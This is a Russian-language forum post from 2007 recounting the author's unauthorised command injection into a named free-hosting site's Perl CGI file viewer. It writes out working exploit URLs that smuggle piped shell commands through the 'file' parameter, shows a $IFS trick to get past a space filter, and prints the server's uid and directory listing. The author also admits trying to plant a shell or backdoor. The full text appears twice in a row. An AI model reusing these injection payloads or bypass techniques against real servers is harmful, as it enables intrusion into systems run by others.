fly
07.05.2007, 15:21
Недавно читал старый номер ][ , нашел статью FORBA о том как он ломал один хостинг. Вот и решил порыть тоже и нашел очень интересную дыру (cgi)в sbn.bz -тут можно зарегать бесплатный сайт(типа народа).
Для начала я зарегал себе акк - xxx.pbnet.ru
Затем попав в панель редактирования моего нового проекта, я увидел ссылку :Загрузка файлов на сервер: в самом низу страницы. Осмотрелся и решил попробовать загрузить файлик с компа, затем решил создать файл в панели. Ввел имя файла hackme.txt, выбрал простой редактор и нажал создать.
Вот строка сост.браузера после создания
http://sbn.bz/cgi-bin/file_viewer.pl?file=hackme.txt&editor=simple&sid=SGzNqR22M0ocEPel3bAGxebAwohxQbGk&dir=&l=1&a=edit_file
Затем ввел произвольных текст в файл blabla и сохранил.
После создания файла я решил просмотреть файл
http://sbn.bz/cgi-bin/file_viewer.pl?a=edit_file&editor=simple&sid=SGzNqR22M0ocEPel3bAGxebAwohxQbGk&dir=&file=hackme.txt&l=1
И вот заметил интересное
&file=hackme.txt&l=1
Тут меня осенило, а если вместо hackme.txt вставить пайпы с командой внутри --|id| и что вы думаете все прокатило и я увидел мои права на сервере
uid=515(www) gid=510(www) groups=510(www)
Затем по обычной схеме я решил проверить ОС, но команда uname -a не выполнилась, но я сразу понял в чем дело. Просто пробел фильтровался перловым скриптом его я заменил $IFS.
http://sbn.bz/cgi-bin/file_viewer.pl?a=edit_file&editor=simple&sid=SGzNqR22M0ocEPel3bAGxebAwohxQbGk&dir=&file=|uname$IFS-a|&l=1
Но опять неудача :(!
Решил вывести листинг файлов на сервере и тут все вышло
http://sbn.bz/cgi-bin/file_viewer.pl?a=edit_file&editor=simple&sid=SGzNqR22M0ocEPel3bAGxebAwohxQbGk&dir=&file=|ls$IFS-la|
А вот и файлы
total 336
drwxr-xr-x 15 root root 4096 Apr 14 18:26 .
drwxr-xr-x 9 root root 4096 Mar 22 2006 ..
-rw-r--r-- 1 root root 96 Dec 8 2005 .htaccess
drwxr-xr-x 4 root root 4096 Apr 29 17:11 Modules
drwxr-xr-x 4 root root 4096 May 16 2006 _admin
drwxr-xr-x 2 root root 4096 Jun 29 2006 admin_
-rwxrwxrwx 1 apacheuser apacheuser 4693 Oct 11 2006 auth.pl
drwxr-xr-x 5 root root 4096 Dec 22 2003 bn
-rwxr-xr-x 1 root root 413 Nov 14 01:33 cenzure_includes.pl
-rwxr-xr-x 1 apacheuser apacheuser 14111 Jun 20 2006 file_viewer.pl
-rwxr-xr-x 1 apacheuser apacheuser 954 Jul 11 2005 full_img.pl
-rwxr-xr-x 1 apacheuser apacheuser 3819 May 2 2005 full_img.pl.old
-rwxr-xr-x 1 apacheuser apacheuser 2368 Jan 12 2004 hosting.pl
drwxr-xr-x 2 root root 4096 Jun 25 2004 ibill
-rwxr-xr-x 1 apacheuser apacheuser 9481 Jun 20 2006 img_viewer.pl
-rwxr-xr-x 1 apacheuser apacheuser 229 Jan 21 2004 link.pl
-rwxr-xr-x 1 apacheuser apacheuser 3702 Jan 23 2004 lost_pwd.pl
drwxr-xr-x 2 root root 4096 Oct 5 2006 mod
drwxr-xr-x 2 root root 4096 Sep 4 2006 ntps
-rwxr-xr-x 1 root root 7505 Jul 28 2006 ntps_adsfree.pl
drwxr-xr-x 2 root root 4096 Apr 29 00:47 parser
drwxr-xr-x 3 root root 4096 May 2 2005 paypal
-rwxr-xr-x 1 apacheuser apacheuser 3207 Dec 22 2003 redirect.pl
-rwxr-xr-x 1 apacheuser apacheuser 13254 Apr 22 2006 reg.pl
drwxr-xr-x 2 root root 4096 Dec 23 2003 rupay
-rwxr-xr-x 1 apacheuser apacheuser 2993 Jun 20 2006 save_template.pl
-rwxr-xr-x 1 apacheuser apacheuser 6259 Dec 22 2003 show.pl
-rwxr-xr-x 1 root root 4324 Sep 4 2006 sms_adsfree.pl
-rwxr-xr-x 1 root root 290 May 26 2006 unsubscribe.pl
-rwxr-xr-x 1 apacheuser apacheuser 6515 Jun 20 2006 upd.pl
drwxr-xr-x 2 root root 4096 Mar 22 2006 upload
drwxr-xr-x 2 root root 4096 Feb 15 19:17 view
-rwxr-xr-x 1 apacheuser apacheuser 12732 Apr 9 2006 view.pl
-rwxr-xr-x 1 apacheuser apacheuser 12347 Mar 9 2006 view.pl.bak
-rwxr-xr-x 1 apacheuser apacheuser 3866 Mar 22 2006 view_templates.pl
drwxr-xr-x 12 apacheuser apacheuser 4096 Jul 3 2005 webtools
Дальше выполнил pwd -- /var/www/html/sbn/cgi-bin
Но опять натолкнулся на ж...Если вставить в пайпы запрос вида --- cd$IFS/var/www/html/sbn/cgi-bin;ls, ничего опять не выполняется, скрипт просто режит мой запрос.
; --режит. Ковырялся долго, но так и не залил не шелл не бекдор.
Нашел еще как можно выполнить команды которые не выполнялись выше например ls
http://sbn.bz/cgi-bin/file_viewer.pl?sid=NHwfwuwredtttgnVBrUU4acLimAs6Tr U&file=/|ls|&dir=
К вашей сессии добавляем &file=/|ls|&dir= и все сохраняем, затем видим в директории файл с названием |ls| просмотрим его и видем листинг файлов!
А если выполнить тоже самое только ls$IFS-la|
без сохранения тоже выводит файлы только в редакторе, а не при просмотре созданного файла! :)
http://sbn.bz/cgi-bin/file_viewer.pl?a=edit_file&editor=simple&sid=SGzNqR22M0ocEPel3bAGxebAwohxQbGk&file=/|ls$IFS-la|&dir=
Просматривать файлы тоже можно!!!
Вот так за полчаса я зарегал себе сайт и нашел брешь, так что надо уволить прогаммиста.
Спасибо за внимание. (с) fly 2007
Для начала я зарегал себе акк - xxx.pbnet.ru
Затем попав в панель редактирования моего нового проекта, я увидел ссылку :Загрузка файлов на сервер: в самом низу страницы. Осмотрелся и решил попробовать загрузить файлик с компа, затем решил создать файл в панели. Ввел имя файла hackme.txt, выбрал простой редактор и нажал создать.
Вот строка сост.браузера после создания
http://sbn.bz/cgi-bin/file_viewer.pl?file=hackme.txt&editor=simple&sid=SGzNqR22M0ocEPel3bAGxebAwohxQbGk&dir=&l=1&a=edit_file
Затем ввел произвольных текст в файл blabla и сохранил.
После создания файла я решил просмотреть файл
http://sbn.bz/cgi-bin/file_viewer.pl?a=edit_file&editor=simple&sid=SGzNqR22M0ocEPel3bAGxebAwohxQbGk&dir=&file=hackme.txt&l=1
И вот заметил интересное
&file=hackme.txt&l=1
Тут меня осенило, а если вместо hackme.txt вставить пайпы с командой внутри --|id| и что вы думаете все прокатило и я увидел мои права на сервере
uid=515(www) gid=510(www) groups=510(www)
Затем по обычной схеме я решил проверить ОС, но команда uname -a не выполнилась, но я сразу понял в чем дело. Просто пробел фильтровался перловым скриптом его я заменил $IFS.
http://sbn.bz/cgi-bin/file_viewer.pl?a=edit_file&editor=simple&sid=SGzNqR22M0ocEPel3bAGxebAwohxQbGk&dir=&file=|uname$IFS-a|&l=1
Но опять неудача :(!
Решил вывести листинг файлов на сервере и тут все вышло
http://sbn.bz/cgi-bin/file_viewer.pl?a=edit_file&editor=simple&sid=SGzNqR22M0ocEPel3bAGxebAwohxQbGk&dir=&file=|ls$IFS-la|
А вот и файлы
total 336
drwxr-xr-x 15 root root 4096 Apr 14 18:26 .
drwxr-xr-x 9 root root 4096 Mar 22 2006 ..
-rw-r--r-- 1 root root 96 Dec 8 2005 .htaccess
drwxr-xr-x 4 root root 4096 Apr 29 17:11 Modules
drwxr-xr-x 4 root root 4096 May 16 2006 _admin
drwxr-xr-x 2 root root 4096 Jun 29 2006 admin_
-rwxrwxrwx 1 apacheuser apacheuser 4693 Oct 11 2006 auth.pl
drwxr-xr-x 5 root root 4096 Dec 22 2003 bn
-rwxr-xr-x 1 root root 413 Nov 14 01:33 cenzure_includes.pl
-rwxr-xr-x 1 apacheuser apacheuser 14111 Jun 20 2006 file_viewer.pl
-rwxr-xr-x 1 apacheuser apacheuser 954 Jul 11 2005 full_img.pl
-rwxr-xr-x 1 apacheuser apacheuser 3819 May 2 2005 full_img.pl.old
-rwxr-xr-x 1 apacheuser apacheuser 2368 Jan 12 2004 hosting.pl
drwxr-xr-x 2 root root 4096 Jun 25 2004 ibill
-rwxr-xr-x 1 apacheuser apacheuser 9481 Jun 20 2006 img_viewer.pl
-rwxr-xr-x 1 apacheuser apacheuser 229 Jan 21 2004 link.pl
-rwxr-xr-x 1 apacheuser apacheuser 3702 Jan 23 2004 lost_pwd.pl
drwxr-xr-x 2 root root 4096 Oct 5 2006 mod
drwxr-xr-x 2 root root 4096 Sep 4 2006 ntps
-rwxr-xr-x 1 root root 7505 Jul 28 2006 ntps_adsfree.pl
drwxr-xr-x 2 root root 4096 Apr 29 00:47 parser
drwxr-xr-x 3 root root 4096 May 2 2005 paypal
-rwxr-xr-x 1 apacheuser apacheuser 3207 Dec 22 2003 redirect.pl
-rwxr-xr-x 1 apacheuser apacheuser 13254 Apr 22 2006 reg.pl
drwxr-xr-x 2 root root 4096 Dec 23 2003 rupay
-rwxr-xr-x 1 apacheuser apacheuser 2993 Jun 20 2006 save_template.pl
-rwxr-xr-x 1 apacheuser apacheuser 6259 Dec 22 2003 show.pl
-rwxr-xr-x 1 root root 4324 Sep 4 2006 sms_adsfree.pl
-rwxr-xr-x 1 root root 290 May 26 2006 unsubscribe.pl
-rwxr-xr-x 1 apacheuser apacheuser 6515 Jun 20 2006 upd.pl
drwxr-xr-x 2 root root 4096 Mar 22 2006 upload
drwxr-xr-x 2 root root 4096 Feb 15 19:17 view
-rwxr-xr-x 1 apacheuser apacheuser 12732 Apr 9 2006 view.pl
-rwxr-xr-x 1 apacheuser apacheuser 12347 Mar 9 2006 view.pl.bak
-rwxr-xr-x 1 apacheuser apacheuser 3866 Mar 22 2006 view_templates.pl
drwxr-xr-x 12 apacheuser apacheuser 4096 Jul 3 2005 webtools
Дальше выполнил pwd -- /var/www/html/sbn/cgi-bin
Но опять натолкнулся на ж...Если вставить в пайпы запрос вида --- cd$IFS/var/www/html/sbn/cgi-bin;ls, ничего опять не выполняется, скрипт просто режит мой запрос.
; --режит. Ковырялся долго, но так и не залил не шелл не бекдор.
Нашел еще как можно выполнить команды которые не выполнялись выше например ls
http://sbn.bz/cgi-bin/file_viewer.pl?sid=NHwfwuwredtttgnVBrUU4acLimAs6Tr U&file=/|ls|&dir=
К вашей сессии добавляем &file=/|ls|&dir= и все сохраняем, затем видим в директории файл с названием |ls| просмотрим его и видем листинг файлов!
А если выполнить тоже самое только ls$IFS-la|
без сохранения тоже выводит файлы только в редакторе, а не при просмотре созданного файла! :)
http://sbn.bz/cgi-bin/file_viewer.pl?a=edit_file&editor=simple&sid=SGzNqR22M0ocEPel3bAGxebAwohxQbGk&file=/|ls$IFS-la|&dir=
Просматривать файлы тоже можно!!!
Вот так за полчаса я зарегал себе сайт и нашел брешь, так что надо уволить прогаммиста.
Спасибо за внимание. (с) fly 2007